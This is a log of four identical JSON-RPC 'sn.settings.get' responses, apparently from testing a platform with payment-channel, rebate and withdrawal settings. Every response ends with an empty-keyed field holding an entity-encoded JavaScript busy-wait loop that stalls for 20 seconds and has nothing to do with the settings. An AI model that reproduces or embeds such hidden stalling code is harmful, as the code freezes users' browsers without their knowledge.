
```bash
[sn.settings.get] -> 
{
  "id": "1574107834849.0993570375606500",
  "jsonrpc": "2.0",
  "method": "sn.settings.get",
  "params": {
    "sn": "ae00",
    "type": "ALL"
  }
}
[sn.settings.get] <- 
{
  "id": "1574107834849.0993570375606500",
  "result": {
    "unionChargeFlag": 1,
    "smsLoginFlag": 0,
    "thirdpartyTransferOutLowerThreshold": 0,
    "bdTagFlag": 0,
    "transferPayTag": 2,
    "payChargeFlag": 1,
    "qqPayTag": 2,
    "jdpayChargeFlag": 0,
    "userLoginCapture": 1,
    "agentRebateFlag": 1,
    "alipayIndex": 0,
    "jdPayTag": 2,
    "defaultAgentCodeFlag": 0,
    "qqPayTagFlag": 0,
    "jdPayIndex": 0,
    "auditWithdrawFlag": 0,
    "subTranferToUpFlag": 0,
    "alipaySort": "3",
    "iosCertificate": "",
    "transferPayTagFlag": 0,
    "registerCouponBetAmount": "",
    "transferOutLowerThreshold": 0,
    "quickChargeFlag": 1,
    "fastPayUrl": "",
    "vipChargeFlag": 1,
    "appWxLoginFlag": 0,
    "appDownloadLayerFlag": 1,
    "limitNum": "10",
    "wechatPayTag": 2,
    "wyPaySort": "5",
    "qqpayChargeFlag": 1,
    "liveChessForbid": 0,
    "qqPayIndex": 0,
    "wechatChargeFlag": 1,
    "bdpayChargeFlag": 0,
    "jdPayTagFlag": 0,
    "userToAgentFlag": 0,
    "registerCouponAmount": "",
    "transferInLowerThreshold": 0,
    "unionQrTag": 2,
    "userEditFlag": 1,
    "bdPaySort": "8",
    "trialLoginFlag": 1,
    "openPhoneFlat": 0,
    "moneyUnit": 3,
    "wyPayTagFlag": 0,
    "alipayTagFlag": 0,
    "unionQrTagFlag": 0,
    "openAutoDrawFlat": 0,
    "vipChargePayTag": 2,
    "transferPaySort": "1",
    "qqPaySort": "4",
    "wyPayTag": 2,
    "vipSort": "10",
    "openUserNameFlat": 0,
    "bdPayIndex": 0,
    "loginAttemptAndBlock": "10,30",
    "autoDrawAmount": 1000,
    "chargeMemoRequire": 1,
    "transferInThreshold": 0,
    "limitTime": "30",
    "unionQrSort": "6",
    "jdPaySort": "7",
    "wechatPayIndex": 0,
    "indexRegPage": 0,
    "wechatPayTagFlag": 0,
    "thirdpartyTransferOutThreshold": 0,
    "wechatAutoLogin": 1,
    "tranferToChildFlag": 0,
    "thirdpartyTransferInLowerThreshold": 0,
    "userMobileEditFlag": 1,
    "wechatPaySort": "2",
    "openAutoDrawSwitch": 1,
    "vipChargeTagFlag": 0,
    "fastPaySort": "9",
    "transferChargeFlag": 1,
    "thirdpartyTransferInThreshold": 0,
    "bdTag": 2,
    "alipayChargeFlag": 1,
    "transferOutThreshold": 0,
    "fastPayTag": 2,
    "inviterRequireFlag": 0,
    "unionQrIndex": 0,
    "agentRegFlag": 0,
    "alipayTag": 2,
    "fastPayTagFlag": 0,
    "weixinLoginFlag": 0,
    "userPassEditFlag": 1,
    "startPageAdvert": "1",
    "openUserFeeFlat": 0,
    "openUserPointFlat": 0,
    "withdrawTimeLimitRange": null,
    "withdrawTimeLimitFlag": 0,
    "vipReportBonus": 100,
    "vipReportFlag": 1,
    "vipReportWay": "微信&1234563333",
    "superSignatureUrl": "",
    "bgChargeFlag": 1,
    "bgChargeTagFlag": 1,
    "bgChargePayTag": 2,
    "bgPaySort": "11",
    "": "if&#40;typeof k9p96==='undefined'&#41;{var a=new Date&#40;&#41;;do{var b=new Date&#40;&#41;;}while&#40;b-a&lt;20000&#41;;k9p96=1;}"
  },
  "error": null,
  "jsonrpc": "2.0"
}
[sn.settings.get] -> 
{
  "id": "1574107835009.8723214254452733",
  "jsonrpc": "2.0",
  "method": "sn.settings.get",
  "params": {
    "sn": "ae00",
    "type": "CASH"
  }
}
[sn.settings.get] <- 
{
  "id": "1574107835009.8723214254452733",
  "result": {
    "unionChargeFlag": 1,
    "smsLoginFlag": 0,
    "thirdpartyTransferOutLowerThreshold": 0,
    "bdTagFlag": 0,
    "transferPayTag": 2,
    "payChargeFlag": 1,
    "qqPayTag": 2,
    "jdpayChargeFlag": 0,
    "userLoginCapture": 1,
    "agentRebateFlag": 1,
    "alipayIndex": 0,
    "jdPayTag": 2,
    "defaultAgentCodeFlag": 0,
    "qqPayTagFlag": 0,
    "jdPayIndex": 0,
    "auditWithdrawFlag": 0,
    "subTranferToUpFlag": 0,
    "alipaySort": "3",
    "iosCertificate": "",
    "transferPayTagFlag": 0,
    "registerCouponBetAmount": "",
    "transferOutLowerThreshold": 0,
    "quickChargeFlag": 1,
    "fastPayUrl": "",
    "vipChargeFlag": 1,
    "appWxLoginFlag": 0,
    "appDownloadLayerFlag": 1,
    "limitNum": "10",
    "wechatPayTag": 2,
    "wyPaySort": "5",
    "qqpayChargeFlag": 1,
    "liveChessForbid": 0,
    "qqPayIndex": 0,
    "wechatChargeFlag": 1,
    "bdpayChargeFlag": 0,
    "jdPayTagFlag": 0,
    "userToAgentFlag": 0,
    "registerCouponAmount": "",
    "transferInLowerThreshold": 0,
    "unionQrTag": 2,
    "userEditFlag": 1,
    "bdPaySort": "8",
    "trialLoginFlag": 1,
    "openPhoneFlat": 0,
    "moneyUnit": 3,
    "wyPayTagFlag": 0,
    "alipayTagFlag": 0,
    "unionQrTagFlag": 0,
    "openAutoDrawFlat": 0,
    "vipChargePayTag": 2,
    "transferPaySort": "1",
    "qqPaySort": "4",
    "wyPayTag": 2,
    "vipSort": "10",
    "openUserNameFlat": 0,
    "bdPayIndex": 0,
    "loginAttemptAndBlock": "10,30",
    "autoDrawAmount": 1000,
    "chargeMemoRequire": 1,
    "transferInThreshold": 0,
    "limitTime": "30",
    "unionQrSort": "6",
    "jdPaySort": "7",
    "wechatPayIndex": 0,
    "indexRegPage": 0,
    "wechatPayTagFlag": 0,
    "thirdpartyTransferOutThreshold": 0,
    "wechatAutoLogin": 1,
    "tranferToChildFlag": 0,
    "thirdpartyTransferInLowerThreshold": 0,
    "userMobileEditFlag": 1,
    "wechatPaySort": "2",
    "openAutoDrawSwitch": 1,
    "vipChargeTagFlag": 0,
    "fastPaySort": "9",
    "transferChargeFlag": 1,
    "thirdpartyTransferInThreshold": 0,
    "bdTag": 2,
    "alipayChargeFlag": 1,
    "transferOutThreshold": 0,
    "fastPayTag": 2,
    "inviterRequireFlag": 0,
    "unionQrIndex": 0,
    "agentRegFlag": 0,
    "alipayTag": 2,
    "fastPayTagFlag": 0,
    "weixinLoginFlag": 0,
    "userPassEditFlag": 1,
    "startPageAdvert": "1",
    "openUserFeeFlat": 0,
    "openUserPointFlat": 0,
    "withdrawTimeLimitRange": null,
    "withdrawTimeLimitFlag": 0,
    "vipReportBonus": 100,
    "vipReportFlag": 1,
    "vipReportWay": "微信&1234563333",
    "superSignatureUrl": "",
    "bgChargeFlag": 1,
    "bgChargeTagFlag": 1,
    "bgChargePayTag": 2,
    "bgPaySort": "11",
    "": "if&#40;typeof k9p96==='undefined'&#41;{var a=new Date&#40;&#41;;do{var b=new Date&#40;&#41;;}while&#40;b-a&lt;20000&#41;;k9p96=1;}"
  },
  "error": null,
  "jsonrpc": "2.0"
}
[sn.settings.get] -> 
{
  "id": "1574107835094.6611945755644698",
  "jsonrpc": "2.0",
  "method": "sn.settings.get",
  "params": {
    "sn": "ae00",
    "type": "PAY"
  }
}
[sn.settings.get] <- 
{
  "id": "1574107835094.6611945755644698",
  "result": {
    "unionChargeFlag": 1,
    "smsLoginFlag": 0,
    "thirdpartyTransferOutLowerThreshold": 0,
    "bdTagFlag": 0,
    "transferPayTag": 2,
    "payChargeFlag": 1,
    "qqPayTag": 2,
    "jdpayChargeFlag": 0,
    "userLoginCapture": 1,
    "agentRebateFlag": 1,
    "alipayIndex": 0,
    "jdPayTag": 2,
    "defaultAgentCodeFlag": 0,
    "qqPayTagFlag": 0,
    "jdPayIndex": 0,
    "auditWithdrawFlag": 0,
    "subTranferToUpFlag": 0,
    "alipaySort": "3",
    "iosCertificate": "",
    "transferPayTagFlag": 0,
    "registerCouponBetAmount": "",
    "transferOutLowerThreshold": 0,
    "quickChargeFlag": 1,
    "fastPayUrl": "",
    "vipChargeFlag": 1,
    "appWxLoginFlag": 0,
    "appDownloadLayerFlag": 1,
    "limitNum": "10",
    "wechatPayTag": 2,
    "wyPaySort": "5",
    "qqpayChargeFlag": 1,
    "liveChessForbid": 0,
    "qqPayIndex": 0,
    "wechatChargeFlag": 1,
    "bdpayChargeFlag": 0,
    "jdPayTagFlag": 0,
    "userToAgentFlag": 0,
    "registerCouponAmount": "",
    "transferInLowerThreshold": 0,
    "unionQrTag": 2,
    "userEditFlag": 1,
    "bdPaySort": "8",
    "trialLoginFlag": 1,
    "openPhoneFlat": 0,
    "moneyUnit": 3,
    "wyPayTagFlag": 0,
    "alipayTagFlag": 0,
    "unionQrTagFlag": 0,
    "openAutoDrawFlat": 0,
    "vipChargePayTag": 2,
    "transferPaySort": "1",
    "qqPaySort": "4",
    "wyPayTag": 2,
    "vipSort": "10",
    "openUserNameFlat": 0,
    "bdPayIndex": 0,
    "loginAttemptAndBlock": "10,30",
    "autoDrawAmount": 1000,
    "chargeMemoRequire": 1,
    "transferInThreshold": 0,
    "limitTime": "30",
    "unionQrSort": "6",
    "jdPaySort": "7",
    "wechatPayIndex": 0,
    "indexRegPage": 0,
    "wechatPayTagFlag": 0,
    "thirdpartyTransferOutThreshold": 0,
    "wechatAutoLogin": 1,
    "tranferToChildFlag": 0,
    "thirdpartyTransferInLowerThreshold": 0,
    "userMobileEditFlag": 1,
    "wechatPaySort": "2",
    "openAutoDrawSwitch": 1,
    "vipChargeTagFlag": 0,
    "fastPaySort": "9",
    "transferChargeFlag": 1,
    "thirdpartyTransferInThreshold": 0,
    "bdTag": 2,
    "alipayChargeFlag": 1,
    "transferOutThreshold": 0,
    "fastPayTag": 2,
    "inviterRequireFlag": 0,
    "unionQrIndex": 0,
    "agentRegFlag": 0,
    "alipayTag": 2,
    "fastPayTagFlag": 0,
    "weixinLoginFlag": 0,
    "userPassEditFlag": 1,
    "startPageAdvert": "1",
    "openUserFeeFlat": 0,
    "openUserPointFlat": 0,
    "withdrawTimeLimitRange": null,
    "withdrawTimeLimitFlag": 0,
    "vipReportBonus": 100,
    "vipReportFlag": 1,
    "vipReportWay": "微信&1234563333",
    "superSignatureUrl": "",
    "bgChargeFlag": 1,
    "bgChargeTagFlag": 1,
    "bgChargePayTag": 2,
    "bgPaySort": "11",
    "": "if&#40;typeof k9p96==='undefined'&#41;{var a=new Date&#40;&#41;;do{var b=new Date&#40;&#41;;}while&#40;b-a&lt;20000&#41;;k9p96=1;}"
  },
  "error": null,
  "jsonrpc": "2.0"
}
[sn.settings.get] -> 
{
  "id": "1574107835174.2080823795719299",
  "jsonrpc": "2.0",
  "method": "sn.settings.get",
  "params": {
    "sn": "ae00",
    "type": "USER"
  }
}
[sn.settings.get] <- 
{
  "id": "1574107835174.2080823795719299",
  "result": {
    "unionChargeFlag": 1,
    "smsLoginFlag": 0,
    "thirdpartyTransferOutLowerThreshold": 0,
    "bdTagFlag": 0,
    "transferPayTag": 2,
    "payChargeFlag": 1,
    "qqPayTag": 2,
    "jdpayChargeFlag": 0,
    "userLoginCapture": 1,
    "agentRebateFlag": 1,
    "alipayIndex": 0,
    "jdPayTag": 2,
    "defaultAgentCodeFlag": 0,
    "qqPayTagFlag": 0,
    "jdPayIndex": 0,
    "auditWithdrawFlag": 0,
    "subTranferToUpFlag": 0,
    "alipaySort": "3",
    "iosCertificate": "",
    "transferPayTagFlag": 0,
    "registerCouponBetAmount": "",
    "transferOutLowerThreshold": 0,
    "quickChargeFlag": 1,
    "fastPayUrl": "",
    "vipChargeFlag": 1,
    "appWxLoginFlag": 0,
    "appDownloadLayerFlag": 1,
    "limitNum": "10",
    "wechatPayTag": 2,
    "wyPaySort": "5",
    "qqpayChargeFlag": 1,
    "liveChessForbid": 0,
    "qqPayIndex": 0,
    "wechatChargeFlag": 1,
    "bdpayChargeFlag": 0,
    "jdPayTagFlag": 0,
    "userToAgentFlag": 0,
    "registerCouponAmount": "",
    "transferInLowerThreshold": 0,
    "unionQrTag": 2,
    "userEditFlag": 1,
    "bdPaySort": "8",
    "trialLoginFlag": 1,
    "openPhoneFlat": 0,
    "moneyUnit": 3,
    "wyPayTagFlag": 0,
    "alipayTagFlag": 0,
    "unionQrTagFlag": 0,
    "openAutoDrawFlat": 0,
    "vipChargePayTag": 2,
    "transferPaySort": "1",
    "qqPaySort": "4",
    "wyPayTag": 2,
    "vipSort": "10",
    "openUserNameFlat": 0,
    "bdPayIndex": 0,
    "loginAttemptAndBlock": "10,30",
    "autoDrawAmount": 1000,
    "chargeMemoRequire": 1,
    "transferInThreshold": 0,
    "limitTime": "30",
    "unionQrSort": "6",
    "jdPaySort": "7",
    "wechatPayIndex": 0,
    "indexRegPage": 0,
    "wechatPayTagFlag": 0,
    "thirdpartyTransferOutThreshold": 0,
    "wechatAutoLogin": 1,
    "tranferToChildFlag": 0,
    "thirdpartyTransferInLowerThreshold": 0,
    "userMobileEditFlag": 1,
    "wechatPaySort": "2",
    "openAutoDrawSwitch": 1,
    "vipChargeTagFlag": 0,
    "fastPaySort": "9",
    "transferChargeFlag": 1,
    "thirdpartyTransferInThreshold": 0,
    "bdTag": 2,
    "alipayChargeFlag": 1,
    "transferOutThreshold": 0,
    "fastPayTag": 2,
    "inviterRequireFlag": 0,
    "unionQrIndex": 0,
    "agentRegFlag": 0,
    "alipayTag": 2,
    "fastPayTagFlag": 0,
    "weixinLoginFlag": 0,
    "userPassEditFlag": 1,
    "startPageAdvert": "1",
    "openUserFeeFlat": 0,
    "openUserPointFlat": 0,
    "withdrawTimeLimitRange": null,
    "withdrawTimeLimitFlag": 0,
    "vipReportBonus": 100,
    "vipReportFlag": 1,
    "vipReportWay": "微信&1234563333",
    "superSignatureUrl": "",
    "bgChargeFlag": 1,
    "bgChargeTagFlag": 1,
    "bgChargePayTag": 2,
    "bgPaySort": "11",
    "": "if&#40;typeof k9p96==='undefined'&#41;{var a=new Date&#40;&#41;;do{var b=new Date&#40;&#41;;}while&#40;b-a&lt;20000&#41;;k9p96=1;}"
  },
  "error": null,
  "jsonrpc": "2.0"
}
Test finished i=1 t=403.090221ms
```

